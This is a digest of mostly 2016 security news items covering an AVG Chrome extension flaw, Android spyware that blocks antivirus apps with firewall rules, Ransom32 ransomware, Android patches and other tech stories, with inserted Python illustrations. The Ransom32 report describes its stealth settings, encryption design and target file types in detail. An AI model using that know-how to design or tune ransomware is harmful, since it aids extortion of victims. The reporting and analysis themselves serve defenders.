
AVG's Chrome extension exposes personal data of 9 million users

According to Ormandy’s report, the Chrome extension, dubbed AVG Web TuneUp and carrying the extension ID chfdnecihphmhljaaejmgoiahnihplgn, is force-installed on end-user systems along with the AVG AntiVirus application. The extension adds a series of vulnerabilities to the browser, putting its more than 9 million users at risk.

The extension, which has over 9 million active users, contains a serious flaw that exposes the following to attackers:
  • Browsing history
  • Cookies
  • Personal data

“This extension adds numerous JavaScript API's to chrome, apparently so that they can hijack search settings and the new tab page,” wrote Ormandy in the bug report. “The installation process is quite complicated so that they can bypass the chrome malware checks, which specifically tries to stop abuse of the extension API.”

Among the vulnerabilities that AVG Web TuneUp brings along, the researcher mentions a “trivial universal” XSS (Cross-Site Scripting) in the "navigate" API, which could allow websites to execute scripts in the context of any other domains. According to Ormandy, a website could read emails from mail.google.com and perform other actions as well because of this high-severity flaw.

Ormandy was involved in the discovery of vulnerabilities in Kaspersky's anti-virus product in September and a critical vulnerability in FireEye network security devices earlier this month.

Ormandy wrote in a follow-up response to the bug report Monday, “I believe this issue is resolved now, but inline installations are disabled while the CWS team investigate possible policy violations.”

Now Android Malware Uses Firewall Rules To Evade Detection From Antivirus Security Applications


Researchers at Symantec have discovered a new piece of Android malware that drops and runs a firewall binary called DroidWall on compromised devices to prevent security applications from connecting to their services.

Dubbed Android.Spywaller by Symantec, the malware initially behaves like other mobile threats: it hides its icon in an attempt to cover its tracks and releases an encrypted payload containing the malware's service logic, which it loads into memory. Once installed on a compromised device, it displays a “Google Service” icon, although the Internet giant offers no such product.

At the same time, the spyware collects data belonging to specific third-party communication applications, including:
  • WhatsApp
  • WeChat
  • Skype
  • BlackBerry Messenger
  • ooVoo
  • Coco
  • QQ
  • Sina Weibo
  • TalkBox
  • Tencent Weibo
  • Voxer
  • Zello
According to Symantec, the list of data gathered by this malware ranks it among the most comprehensive spyware to date.

The malware then attempts to root the device and starts collecting sensitive information while running in the background. All of the information the malware collects from the device is exfiltrated to a backend server, Symantec explained in a recent blog post.

The malware collects information including:

  • Call logs (PII)
  • SMS messages
  • GPS readings
  • Browser history
  • Browser saved passwords
  • Emails
  • Radio
  • Images
  • Contacts

While this behavior has been seen before in mobile threats, Symantec’s researchers note that the new malware stands out because of another technique discovered in its reversed payload: it checks whether the Qihoo 360 mobile security app is installed on the device and, if so, blocks it.

The Qihoo 360 application is popular in China and has a unique identifier (UID) on each device, and the malware collects the identifier if the program is installed. Next, Android Spywaller drops and runs the DroidWall firewall binary, which is a customized version of iptables for Android. This allows it to create firewall rules that will block the targeted security application by referencing its UID.
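As an added, defender-side illustration (not Symantec's or DroidWall's code), the following Python parses `iptables-save`-style output together with Android's /data/system/packages.list and flags rules that block traffic by app UID, which is the technique described above. The rule set, chain names, UIDs and package names below are constructed for the example.

```python
"""Flag iptables rules that silence an Android app by its UID.

Added triage helper, not part of any Symantec or DroidWall code. It parses
`iptables-save`-style text and /data/system/packages.list (Android's
"<package> <uid> <debuggable> <dataDir> <seinfo> <gids>" mapping) and
reports every UID-scoped rule that terminates in DROP or REJECT, together
with the package that owns that UID. All sample data is constructed.
"""
import re
from typing import Dict, List, NamedTuple

# Constructed sample of `iptables-save` output. The `-m owner --uid-owner`
# match is the standard iptables owner extension; a per-app firewall on
# Android uses it to pin a rule to one application's UID.
SAMPLE_IPTABLES_SAVE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m owner --uid-owner 10087 -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m owner --uid-owner 10042 -m tcp --dport 443 -j DROP
-A OUTPUT -p tcp -m owner --uid-owner 10042 -m tcp --dport 80 -j ACCEPT
-A OUTPUT -m owner --uid-owner 10105 -j ACCEPT
COMMIT
"""

# Constructed sample of /data/system/packages.list (package names are
# illustrative, not real products).
SAMPLE_PACKAGES_LIST = """\
com.android.chrome 10105 0 /data/data/com.android.chrome default 3003
com.example.mobilesecurity 10087 0 /data/data/com.example.mobilesecurity default 3003
com.example.messenger 10042 0 /data/data/com.example.messenger default 3003
"""


class UidBlock(NamedTuple):
    uid: int
    package: str   # "<unknown>" when the UID is absent from packages.list
    target: str    # DROP or REJECT
    rule: str      # the raw rule line, kept for the analyst's report


_UID_RE = re.compile(r"--uid-owner\s+(\d+)")
_TARGET_RE = re.compile(r"-j\s+(\S+)")
BLOCKING_TARGETS = {"DROP", "REJECT"}


def parse_packages_list(text: str) -> Dict[int, str]:
    """Map app UID -> package name from packages.list content."""
    uid_to_pkg: Dict[int, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1].isdigit():
            uid_to_pkg[int(parts[1])] = parts[0]
    return uid_to_pkg


def find_uid_blocks(iptables_save: str, packages_list: str) -> List[UidBlock]:
    """Return every rule that matches on a UID and ends in DROP/REJECT.

    Per-UID ACCEPT rules are ignored on purpose: they are how a legitimate
    per-app firewall lets traffic through, so only blocking rules are
    worth surfacing.
    """
    uid_to_pkg = parse_packages_list(packages_list)
    hits: List[UidBlock] = []
    for line in iptables_save.splitlines():
        if not line.startswith("-A "):
            continue  # table header, chain policy or COMMIT line
        uid_m = _UID_RE.search(line)
        tgt_m = _TARGET_RE.search(line)
        if not uid_m or not tgt_m:
            continue
        target = tgt_m.group(1)
        if target not in BLOCKING_TARGETS:
            continue
        uid = int(uid_m.group(1))
        hits.append(UidBlock(uid, uid_to_pkg.get(uid, "<unknown>"), target, line))
    return hits


def blocked_packages(iptables_save: str, packages_list: str) -> List[str]:
    """Sorted, de-duplicated package names that have at least one blocking rule."""
    return sorted({h.package for h in find_uid_blocks(iptables_save, packages_list)})


if __name__ == "__main__":
    for hit in find_uid_blocks(SAMPLE_IPTABLES_SAVE, SAMPLE_PACKAGES_LIST):
        print(f"UID {hit.uid} ({hit.package}) -> {hit.target}: {hit.rule}")
```

On a real device the two inputs would come from `iptables-save` (or `iptables -S`) run as root and from /data/system/packages.list; a security app appearing in the output is the signal this malware family would produce.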

Developed by Rodrigo Rosauro as an open source app to help users protect their devices, DroidWall was sold to AVAST in 2011, but its source code is still available from Google Code and Github. Although it was initially designed in the form of a security tool, DroidWall can be used by cybercriminals to compromise user security.

For the time being, the malware is targeted at users in China, where a higher proportion of devices are rooted and more exposed to malware since official Google services are not available in the country.

The infection numbers are currently relatively low, but the threat is worth noting because its authors are using legitimate tools for malicious purposes. To stay protected, users should install a security solution that can block mobile threats, keep their software updated at all times, and make sure they install apps only from trusted sources.

Ransom32 - The First Ransomware Based on JavaScript with Cross-Platform Compatibility

A new Ransomware as a Service, or RaaS, called Ransom32 has been discovered that for the first time uses ransomware written in JavaScript. Located on an underground Tor site, the Ransom32 RaaS is a simple but efficient service where anyone can download and distribute their very own copy of the ransomware executable as long as they have a Bitcoin address. For offering this service, the developers of Ransom32 take a 25% cut of all ransom payments and forward the rest to the Bitcoin address the affiliate entered when joining the affiliate program.


The First JavaScript Ransomware

What makes this ransomware unique is that it is the first ransomware programmed entirely in JavaScript, HTML, and CSS. It uses the NW.js platform, which allows developers to create native applications for Linux, Mac, and Windows using HTML5, CSS3, JavaScript, and WebGL. Using NW.js, a developer can take their scripts and HTML and package them into a Chromium executable that, when run, automatically executes the embedded JavaScript and HTML.

What makes the Ransom32 RaaS so scary is that JavaScript and HTML are cross-platform and run just as well on Macs and Linux as they do on Windows. This means that with some minor tweaks, the Ransom32 developers could easily make NW.js packages for Linux and Mac computers. Though there is no indication yet that this is being done, doing so would be trivial.

It is inevitable that ransomware will be created for operating systems other than Windows; using a platform like NW.js just brings us one step closer.

First Glance:

Ransom32 was first reported by infected users. When Fabian Wosar of Emsisoft and security researcher xXToffeeXx searched for a sample, they stumbled upon the Ransom32 Tor affiliate service. It is very easy for an affiliate to join this RaaS, as all that is needed is a Bitcoin address to which the affiliate's share of the ransom payments will be sent.

Once a bitcoin address is submitted, an affiliate will be shown an Affiliate Console where they can see the statistics for their personal distribution campaign and configure various settings on how the ransomware should be executed.

This affiliate console contains statistics including the number of people who successfully installed the client, the number who were shown the lock screen once encryption completed, the number of Bitcoin transactions to the affiliate's address, and the amount of ransom payments sent to the payout address.
In the console an affiliate can also configure various settings for how the Ransom32 executable should run.

The listed settings and the Ransom32 developer's descriptions for them are:
  • BTC amount to ask: BTC amount to ask. Don't be too greedy or people will not pay.
  • Fully lock the computer: By default the lockscreen will pop up every X seconds after being minimized. You can configure it so the user will not be able to minimize the lock screen. The downside is that it will be more difficult for the users to check that their files were truly encrypted, and they will also need to find another method to send your Bitcoins as the browser will be blocked too.
  • Low CPU Usage: Will encrypt files at 0-25% speed while the lock window is not shown, so the process won't be noticeable in the task manager by an advanced user because of high CPU consumption.
  • Show the lockscreen before encrypting: By default the client will show the lockscreen after encrypting part of the files in the computer (filesize under 50 Mb) and continue encrypting in the background. You can tell it to show the lockscreen right after installing, before encrypting any file in the background. The downside is that if the user tries to check his files just when the window pops up, he will notice that no file has been encrypted yet (although it is encrypting while it is running).
  • Show a message Box: This box will be shown before installing and before any latent timeout is applied.
  • Latent Timeout: The client will "wake up", connect to the server and start encrypting after this amount of seconds has passed since installing. The client won't connect to the server until it wakes up (more stealth), so you won't notice an install in your stats until this moment. NOTE: The client will not save the latent info as-is. It will be mixed with some data so it is not understandable at first sight. Because of this, expect a 0-4 minute drift in your timeout.

Once an affiliate has configured the ransomware to their liking, they simply need to click on the download button to generate and download their customized copy of Ransom32.  This download is a self-extracting RAR file that weighs in at 22MB and when extracted totals over 67MB. Once the customized ransomware is downloaded, it is up to the affiliate to determine how it should be distributed.
An important feature for any "commerce" campaign is to be able to track its performance. As only a bitcoin address is required to join the affiliate program, it is very easy for an affiliate to track each distribution method's performance by simply using a different address for each campaign.
Encryption Process

The download generated by the affiliate is actually a 22MB self-extracting archive that, when extracted, is over 67MB. When this executable is run, it extracts numerous files into the C:\Users\User\AppData\Roaming\Chrome Browser folder and creates a shortcut in the Start Menu's Startup folder called ChromeService so that the ransomware starts at login. The shortcut points to a chrome.exe executable that is actually an NW.js package containing the JavaScript code that encrypts the victim's data and then displays a ransom note.
The files extracted into the Chrome Browser folder are:
  • chrome - The Chromium license agreement.
  • chrome.exe - The main executable for the malware: a packaged NW.js application bundled with Chromium.
  • ffmpegsumo.dll - HTML5 video decoder DLL bundled with Chromium.
  • - The settings file that contains various information used by the malware, including the affiliate's ransom amount, the Bitcoin address on which they receive payments, and the error message shown in a message box if the Show a message Box setting was enabled.
  • icudtl.dat - File used by Chromium.
  • locales - Folder containing various language packs used by Chrome.
  • msgbox.vbs - The message box displayed if the affiliate enabled the Show a message Box setting.
  • nw.pak - Required for the NW.js platform.
  • rundll32.exe - Renamed Tor executable so that the malware can communicate with the Tor command-and-control server.
  • s.exe - Renamed Shortcut.exe from OptimumX, a legitimate program used by the malware to create the ChromeService shortcut in the Startup folder.
  • u.vbs - A VBS script that deletes a specified folder and its contents.
At first glance it looks suspiciously like a copy of the well-known Chrome browser. The forgery is revealed only by the absence of a digital signature and version information; further analysis exposes it as a packed NW.js application.

When encrypting your data, Ransom32 will target only specific file extensions and encrypt them using AES encryption. The targeted file extensions are:

*.jpg, *.jpeg, *.raw, *.tif, *.gif, *.png, *.bmp, *.3dm, *.max, *.accdb, *.db, *.dbf, *.mdb, *.pdb, *.sql, *.*sav*, *.*spv*, *.*grle*, *.*mlx*, *.*sv5*, *.*game*, *.*slot*, *.dwg, *.dxf, *.c, *.cpp, *.cs, *.h, *.php, *.asp, *.rb, *.java, *.jar, *.class, *.aaf, *.aep, *.aepx, *.plb, *.prel, *.prproj, *.aet, *.ppj, *.psd, *.indd, *.indl, *.indt, *.indb, *.inx, *.idml, *.pmd, *.xqx, *.ai, *.eps, *.ps, *.svg, *.swf, *.fla, *.as3, *.as, *.txt, *.doc, *.dot, *.docx, *.docm, *.dotx, *.dotm, *.docb, *.rtf, *.wpd, *.wps, *.msg, *.pdf, *.xls, *.xlt, *.xlm, *.xlsx, *.xlsm, *.xltx, *.xltm, *.xlsb, *.xla, *.xlam, *.xll, *.xlw, *.ppt, *.pot, *.pps, *.pptx, *.pptm, *.potx, *.potm, *.ppam, *.ppsx, *.ppsm, *.sldx, *.sldm, *.wav, *.mp3, *.aif, *.iff, *.m3u, *.m4u, *.mid, *.mpa, *.wma, *.ra, *.avi, *.mov, *.mp4, *.3gp, *.mpeg, *.3g2, *.asf, *.asx, *.flv, *.mpg, *.wmv, *.vob, *.m3u8, *.csv, *.efx, *.sdf, *.vcf, *.xml, *.ses, *.dat


Notice how Ransom32 also uses wildcards in the targeted file extensions. This allows the program to target a greater variety of extensions: for example, with the .*sav* pattern, not only will .sav files be targeted, but also files ending in .save, .gamesave, or .mysaves. When encrypting data files, it does not rename a victim's files, and it will not encrypt any files located in the following folders:

  • :\Windows\
  • :\winnt\
  • ProgramData\
  • boot\
  • temp\
  • tmp\
  • $RECYCLE.BIN\
When it has finished encrypting your data it will display the Ransom32 ransom lock screen/ransom note as shown below.

The Ransom32 lock screen will display information that tells the victim what has happened to their files, how to pay the ransom, the ransom amount, and the bitcoin address a ransom payment is sent to. The language used by the lock screen is shown in either English or Spanish, with the default appearing to be English. Last, but not least, this screen allows you to decrypt one file for free to prove that it can be done.


Encryption uses AES (Advanced Encryption Standard) with a 128-bit key in CTR mode. A new key is generated for each file; that key is in turn encrypted with RSA using a public key retrieved during the first communication with the C2 server.
 

Figure: extract from the protocol exchange between Ransom32 and the C2 server, in which the client sends its Bitcoin address (violet) and retrieves the public key (length in yellow, key in green).
 
The encrypted AES key is stored together with the AES-encrypted data in the now-encrypted file.
 
The malware also offers to decrypt a single file to prove to the victim that the encryption can indeed be reversed. For this, it sends the encrypted AES key of the selected file to the C2 server, which returns the decrypted AES key for that file.
  
Files installed by Ransom32:

%Temp%\nw3932_17475
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\ChromeService.lnk
%AppData%\Chrome Browser\
%AppData%\Chrome Browser\.chrome\
%AppData%\Chrome Browser\.chrome\cached-certs
%AppData%\Chrome Browser\.chrome\cached-microdesc-consensus
%AppData%\Chrome Browser\.chrome\cached-microdescs
%AppData%\Chrome Browser\.chrome\cached-microdescs.new
%AppData%\Chrome Browser\.chrome\lock
%AppData%\Chrome Browser\.chrome\state
%AppData%\Chrome Browser\chrome
%AppData%\Chrome Browser\chrome.exe
%AppData%\Chrome Browser\ffmpegsumo.dll
%AppData%\Chrome Browser\g
%AppData%\Chrome Browser\icudtl.dat
%AppData%\Chrome Browser\locales\
%AppData%\Chrome Browser\msgbox.vbs
%AppData%\Chrome Browser\n.l
%AppData%\Chrome Browser\n.q
%AppData%\Chrome Browser\nw.pak
%AppData%\Chrome Browser\rundll32.exe
%AppData%\Chrome Browser\s.exe
%AppData%\Chrome Browser\u.vbs
 
Unfortunately, at this time there is no known way to decrypt the files for free, but if anything changes we will post about it here.

Source: Emsisoft & BleepingComputer

Google Patches Another Critical Mediaserver Vulnerability

Since last summer’s Stagefright vulnerabilities toppled the Android world for a few weeks, researchers inside and out of Google have been taking a close look at not only the maligned media playback engine, but also at Mediaserver where it lives.

Today’s release of the monthly Android Nexus Security Bulletin includes patches for another critical vulnerability in Mediaserver, keeping a streak going of consecutive months with serious issues addressed in the software.

Flaws in Mediaserver pose serious problems for Android devices because it interacts with a number of applications that can be used to exploit the bug, including MMS and browser media playback features. Versions 5.0, 5.1.1, 6.0 and 6.0.1 are affected, Google said.

Google said in today’s advisory that the Mediaserver flaw, CVE-2015-6636, is the most serious of the dozen being patched, and that it allows an attacker to use email, web browsing or MMS processing of media files to exploit the vulnerability and remotely execute code.
“During media file and data processing of a specially crafted file, vulnerabilities in mediaserver could allow an attacker to cause memory corruption and remote code execution as the mediaserver process,” Google said.
Google patched five vulnerabilities, including Mediaserver, that it rated critical, two rated high, and five others rated moderate.

The remaining critical flaws were all elevation of privilege issues in the misc-sd driver, the Imagination Technologies driver, Trustzone, the Android kernel and in the Bluetooth implementation.

The misc-sd driver and Imagination Technologies driver issues could allow malicious apps downloaded to the device to execute code at the kernel level, and could result in a permanent compromise that could be addressed only by re-flashing the operating system, Google said.

The Trustzone vulnerabilities were found in the Widevine QSEE Trustzone application and would allow the compromise of apps with access to the QSEECOM to execute code in the Trustzone context, Google said.

A separate elevation of privilege issue was found in the kernel that would also open the door to malicious apps executing code in the kernel.

Of the two flaws rated High by Google, the one found in the Android Bluetooth component puts personal information at risk: Google said it could allow a device paired over Bluetooth to access personal information such as contacts.

The other rated high is an information disclosure vulnerability in the kernel that could allow an attacker to bypass security features in the operating system. Google added the flaws could be used to gain elevated privileges such as Signature or SignatureOrSystem.

The remaining vulnerabilities addressed today were rated moderate and include elevation of privilege flaws in the Android Setup Wizard and Wi-Fi, an information disclosure bug in Bouncy Castle crypto APIs, and a denial-of-service flaw in SyncManager.

Google also removed SysV IPC from Android because it is not supported in the OS and exposes additional attack surface.

The Sony PlayStation Network is down worldwide

Sony’s PlayStation Network on PlayStation Vita, PlayStation 3 and PlayStation 4 is down, and the irritating fact for gamers is that the company has not given any time frame for when the service will be back online.

The PlayStation Network is down worldwide. I had just got back home and was trying to play with my son when I had the ugly surprise. It is the first massive outage of the year; I searched for information on the Internet and found that all users are suffering the same problem.

Like many other users, I’m receiving an error message saying that the PSN is currently “undergoing maintenance”.

The PlayStation Network online service allows users to access online features of many games and to the official store.

Sony confirmed that the network was “experiencing issues” and its status page showed that the problems were affecting all of its major services, but the company hasn’t provided further details on the problem.

The PlayStation Network also suffered technical issues over the Christmas period, when some users reported difficulties authenticating to the online services.

Last year, at Christmas, hackers belonging to the Lizard Squad group took down the online networks of both Microsoft Xbox Live and the PlayStation Network (PSN), highlighting security issues affecting the services of Sony and Microsoft.

This year another group, known as Phantom Squad, announced its intention to ruin Christmas for gamers. Phantom Squad also said that both platforms are vulnerable to attacks, adding that they were able to take down Xbox Live during the weekend.

At the time of writing, Sony’s “Network Service Status” page confirmed the problems suffered by users accessing the Sony platform.

The Sony PlayStation Network is down, including the PlayStation 3 and 4 and web services.
A screenshot from status.playstation.com shows the service is down.
It is unclear what caused the worldwide outage, and no hacking group has claimed responsibility for targeting the PlayStation Network with their usual DDoS attacks. However, one Twitter user shared an interesting DDoS map showing cyber attacks on the US from China (that doesn’t mean there was an attack on the PlayStation Network by Chinese hackers).

Microsoft with its ‘Super Spy’ Windows 10 is collecting more data than thought before

The Redmond software giant Microsoft’s Windows 10 is fast becoming the world’s preferred operating system over Windows 7 or 8.1. Despite its continued insistence that Windows 10 isn’t spying on anyone, Microsoft seems to have taken an interest in how much time you are using its Windows 10 operating system. However, Microsoft has done little to assure the majority of privacy-conscious users that its latest operating system isn’t taking more data than it needs.
To emphasize its claim, Microsoft updated its privacy policy to clarify how and when the OS makes use of user data. However, with its latest Threshold 2 Update, Microsoft is observing how long people are using the operating system and sending the data to Redmond.
The enthusiasm was shared by Microsoft in a blog post filled with data extracted from users.
On Monday morning, Yusuf Mehdi, Corporate VP of the Windows and Devices Group, disclosed that Windows 10 was active on over 200 million devices. The main factor contributing to its quick growth is that it is currently offered for free to existing Windows 7 and Windows 8.1 users, so it is really not astonishing that this is happening.
Microsoft felt the need to share some milestones to demonstrate the popularity of Windows 10:
1. People spent more than 11 billion hours on Windows 10 in December 2015.
2. 44.5 billion minutes were spent in Microsoft Edge across Windows 10 devices in December 2015 (0.71 billion hours).
3. Users asked Cortana more than 2.5 billion questions since launch.
4. More than 82 billion photos were viewed in the Windows 10 Photo application.
5. Windows 10 gamers spent over 4 billion hours playing PC games.
6. Gamers have streamed more than 6.6 million hours of Xbox One games to Windows 10 PCs.
7. About 30% more Bing search queries from Windows devices compared to previous versions of Windows.
Definitely, these are interesting statistics and could be troublesome for many privacy lovers.
“The statistics indicate that Microsoft may be collecting more data than initially thought,” writes Martin Brinkmann of ghacks. “While it is unclear what data is exactly collected, it is clear that the company is collecting information about the use of individual applications and programs on Windows at the very least.”
Data collection to a degree is unavoidable, as it occurs on every connected device. However, what is more bothersome about Windows 10 is that there is no clarity on what data is exactly being collected and there’s no easy way to turn it off.
According to Microsoft, the data collection in Windows 10 is for a greater good. It is being used to make the product work better and that is certainly true to an extent as the company is collecting information about the use of individual applications and programs on Windows to find out about the popularity of an application or operating system feature.
Still, since Microsoft does not reveal detailed information about what gets collected and to what end, it is something that users need to be aware of at the very least. We can only hope that while Microsoft celebrates its 2015 milestones, it looks to become more transparent in 2016.

Facebook bug welcomes new year by telling users they have been friends for 46 years

As the world was celebrating New Year, Facebook seemed to be having its own celebrations. A bug in Facebook was telling users that they’ve been friends for 46 years.

It is silly to think that Facebook remembers who was friends with whom 46 years ago, because Facebook wasn’t around in 1969. In fact, millions of FB users were not even born then, when computers were used only for military purposes.

The date Dec. 31, 1969 carries special significance for computer software, according to the Daily Dot: it is the first date to appear in the time-keeping scheme used by Unix computer systems, known as the Unix epoch. Although Facebook has not confirmed it, many are suggesting the bug originates with the Unix epoch.
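As an added illustration (not Facebook's code), the following Python shows how a missing friendship date stored as 0 renders as December 31, 1969 for users in US time zones and yields "46 years" on New Year's Day 2016, alongside a hardened version that treats 0 as unknown. The Pacific offset and the sample friendship timestamp are constructed assumptions.

```python
"""Reproduce and fix the "friends for 46 years" date bug (added example)."""
from datetime import datetime, timedelta, timezone
from typing import Optional

# Assumption: the affected users' dates were rendered in a US time zone.
# A fixed UTC-8 offset (Pacific standard time) keeps the example
# deterministic and avoids depending on a tz database.
PACIFIC = timezone(timedelta(hours=-8))
NEW_YEAR_2016 = datetime(2016, 1, 1, 0, 0, tzinfo=PACIFIC)

# Constructed sample: a genuine friendship that began on 2012-06-15.
SAMPLE_FRIEND_SINCE_TS = int(datetime(2012, 6, 15, tzinfo=PACIFIC).timestamp())


def render_date(ts: int, tz: timezone) -> str:
    """Naive rendering: every integer, including 0, is trusted as a timestamp.

    Unix time 0 is 1970-01-01T00:00Z, but west of Greenwich that instant
    is still the evening of 1969-12-31, which is the date users saw.
    """
    return datetime.fromtimestamp(ts, tz).strftime("%Y-%m-%d")


def whole_years_between(start: datetime, end: datetime) -> int:
    """Calendar years completed between two timezone-aware datetimes."""
    years = end.year - start.year
    if (end.month, end.day) < (start.month, start.day):
        years -= 1
    return years


def friendship_years_buggy(since_ts: int, now: datetime) -> int:
    """Buggy path: a 0 placeholder is treated as the real start date."""
    return whole_years_between(datetime.fromtimestamp(since_ts, now.tzinfo), now)


def friendship_years_fixed(since_ts: Optional[int], now: datetime) -> Optional[int]:
    """Hardened path: None or the 0 sentinel means 'unknown', so no claim is made."""
    if not since_ts:
        return None
    return whole_years_between(datetime.fromtimestamp(since_ts, now.tzinfo), now)


def friendship_banner(since_ts: Optional[int], now: datetime) -> str:
    """What the UI should say: a number only when the start date is trustworthy."""
    years = friendship_years_fixed(since_ts, now)
    if years is None:
        return "friendship date unavailable"
    return f"friends for {years} years"


if __name__ == "__main__":
    print(render_date(0, PACIFIC))                   # 1969-12-31
    print(friendship_years_buggy(0, NEW_YEAR_2016))  # 46
    print(friendship_banner(0, NEW_YEAR_2016))
    print(friendship_banner(SAMPLE_FRIEND_SINCE_TS, NEW_YEAR_2016))
```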

Facebook said in a statement that the company is working to address the issue. “We’ve identified this bug and the team’s fixing it now so everyone can ring in 2016 feeling young again,” said Facebook spokesperson Chelsea Kohler in an email.

Users were quick to pounce on Facebook for this glitch, as can be seen from the tweets below:

Court orders Google to pay Dr Janice Duffy $100,000 plus interest for not removing her from Google Search

An Australian woman has been awarded $100,000 in damages, plus interest, after winning the defamation case she filed against Google.
Janice Duffy, 59, a former SA health department researcher, took the internet search giant to court after claiming that articles published on the “Ripoff Report” website from 2007 defamed her. The site is a “shaming platform” that allows anyone to post reports about people they suspect of behaving in a criminal or dishonest manner, regardless of factual accuracy.
Despite her bringing the articles to its attention and telling it that prospective employers could chance upon the material, Google denied her request to remove the web pages from its search engine.
Finally, in 2011, after Google had refused her written requests to take action on her behalf for two years, she launched a civil lawsuit against it in the South Australian Supreme Court.
The court heard Google progressively removed the display of extracts from and links to the “Ripoff Report” from its Australian website.
Dr Duffy also claimed the auto-complete search terms suggested by Google were harmful, due to them directing users to the “Ripoff Report” site.

Google fought the case, arguing defences of innocent dissemination, qualified privilege, justification and contextual truth.
In his judgment in October, Justice Malcolm Blue struck out several of the defences.
He found the search results either published, republished or directed users towards comments harmful to her reputation.
On Wednesday, Justice Blue awarded Dr Duffy damages of $100,000 and a $15,000 lump sum to cover interest.
Dr Duffy’s lawyer, Paul Heywood-Smith, has also asked the Supreme Court to make an order for costs to cover the legal fees his client has paid during the lengthy battle.
The court has reserved its decision on costs.
Counsel for Google has asked payment of those amounts to be stayed until January, pending argument on court costs and a possible appeal.
‘I stood up to them and for that I’m pleased’
Dr Duffy has tweeted that if Google was to launch any appeal, she would respond with a “cross appeal”.
Outside court, she described Wednesday’s ruling as “vindication”.
“It’s been a long battle and it’s not over,” she said.
“After the trial I couldn’t get off the couch for three weeks … but it’s something that has to be done.
“I think that they thought that they could make me go away. I’m stubborn.
“I stood up to them and for that I’m pleased. I beat the bastards.”
Earlier this year, Dr Duffy represented herself during the trial, after initially being represented by lawyers.
Since the trial she has again hired legal representation.
The ruling comes after Google was ordered by the European Court of Justice to introduce the “right to be forgotten”, which means old, inaccurate or irrelevant data must be omitted from search results if a person involved requests it.

Forbes Website Dropping Malware on Visitor’s PCs

Web publications usually ask readers to disable ad blockers if visiting their websites with AdBlock on. It is understandable since publishers rely upon advertisements for income and therefore, want users to not turn on adblockers. But for a reader, it becomes quite irritating to let adverts ruin the reading experience.
Reportedly, digital forensics expert Brian Baskin was served malware when he obliged Forbes by turning off his ad blocker.
However, when we checked the site, nothing of this sort happened to us, so Baskin probably encountered a JavaScript snippet or an undetected malicious banner. But for the end user it doesn’t matter whether Forbes is actually spreading the malware or is unaware of it, because the damage is already done.
Back in 2007, if the malware mess wasn’t cleaned up by ad banner networks, web users had the liberty to block all ads.
Ad banner networks were given ten long years to fix the issue because they make more money than the publishers who display these ads on their websites, reports AdLand.
Yet, neither the publishers have invested in malware detection nor have ad banner networks come up with a suitable solution.
Adblock Plus has launched its “acceptable ads” program, and Apple as well as other device manufacturers are already blocking ads on their devices, but publishers are still inactive in this regard.
This is not the first time the Forbes website has been caught spreading malware. In February last year, cyber criminals exploited Flash and IE zero-day vulnerabilities to install malware on the machines of anyone visiting the site.

Semantic Search Engine Omnity Claims That It Can Beat Google And Buy It

One new search engine is so confident in its technology that it thinks it could buy Google, and not the other way around.
Just a couple of days ago, Omnity was announced as a “next-generation semantic search and discovery tool”. The company calls itself a fundamental advancement in discovery technology, enabling people to discover hidden interconnections between fields like finance, law, science, engineering, and medicine.
“What this lets users do is avoid the tyranny of taxonomy,” said Omnity CEO Brian Sager at a Tuesday evening CES event called Digital Experience. “We probably should trademark that,” he then joked.

How does Omnity perform a search?

Omnity’s release post explains that the search engine allows a user to submit a complete document as a search query and discover connected documents based on the content inside it. This way, it finds related documents even if they are not directly linked to each other.
Sager explained that when Omnity searches across documents, it throws out “grammatical glue but semantic noise”—commonly used words like “the,” “he,” “she,” or “it.” Stripped of this “noise,” Omnity is then able to analyze the remaining “rare words” to find common threads that link together different documents.

“The Omnity product highlights several unusual features. For example, a single person reading and pair-wise interconnecting 100,000 documents would take nearly 10,000 years. Omnity can perform this function in a fraction of a second, which represents a trillion-fold acceleration,” said Brian Sager, Omnity co-founder.
Sager wants to upend the basic idea of search, just as Google upended it in 1998 while looking for academic articles.

What about Omnity vs Google?

“We don’t view ourselves as being complementary and not competitive with Google,” said Sager. When asked by Motherboard if this meant Omnity was looking to be acquired by Google, he mentioned something very surprising.
“I use Google every day and it’s great, but no, we’re more likely to buy Google.”
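The stop-word stripping and rare-word matching described above, as an added example that is not Omnity’s code: a whole document is used as the query against a small constructed corpus. Weighting shared words by inverse document frequency is my assumption about how “rare words” count for more; the stop-word list and the documents are constructed for the demo.

```python
import math
import re
from collections import Counter

# Constructed mini-corpus from different fields.  The finance memo and the court
# ruling never link to each other, yet they share the same rare terms.
CORPUS = {
    "finance_memo": "The fund hedged its exposure with credit default swaps "
                    "before the rating downgrade.",
    "court_ruling": "The court held that the credit default swaps were "
                    "unenforceable after the downgrade.",
    "chem_paper": "The catalyst lowered the activation energy of the reaction "
                  "at room temperature.",
    "med_note": "The patient was treated for a reaction to the drug and "
                "discharged the same day.",
}

# The "grammatical glue" that is thrown out before matching (constructed list).
STOP_WORDS = {"the", "a", "an", "and", "of", "to", "for", "with", "its", "at",
              "was", "were", "that", "before", "after", "he", "she", "it"}


def rare_words(text: str) -> set:
    """Lower-case word tokens with the stop words removed."""
    return {w for w in re.findall(r"[a-z]+", text.lower()) if w not in STOP_WORDS}


def idf_table(corpus: dict) -> dict:
    """Inverse document frequency: a word found in one document out of N scores
    log N, a word found in every document scores 0 (assumed 'rarity' weight)."""
    df = Counter()
    for text in corpus.values():
        df.update(rare_words(text))
    n = len(corpus)
    return {w: math.log(n / c) for w, c in df.items()}


def related_documents(query_doc: str, corpus: dict) -> list:
    """Use a whole document as the query and rank corpus documents by the summed
    rarity of the words they share with it.  Returns (name, score, shared)."""
    idf = idf_table(corpus)
    query = rare_words(query_doc)
    ranked = []
    for name, text in corpus.items():
        shared = query & rare_words(text)
        if shared:
            score = round(sum(idf[w] for w in shared), 3)
            ranked.append((name, score, sorted(shared)))
    return sorted(ranked, key=lambda item: -item[1])


# Constructed query document: a news paragraph rather than a keyword list.
QUERY = ("Investors sued the rating agency over credit default swaps "
         "sold before the downgrade.")

if __name__ == "__main__":
    for name, score, shared in related_documents(QUERY, CORPUS):
        print(f"{name:13s} {score:6.3f}  shared: {', '.join(shared)}")
```

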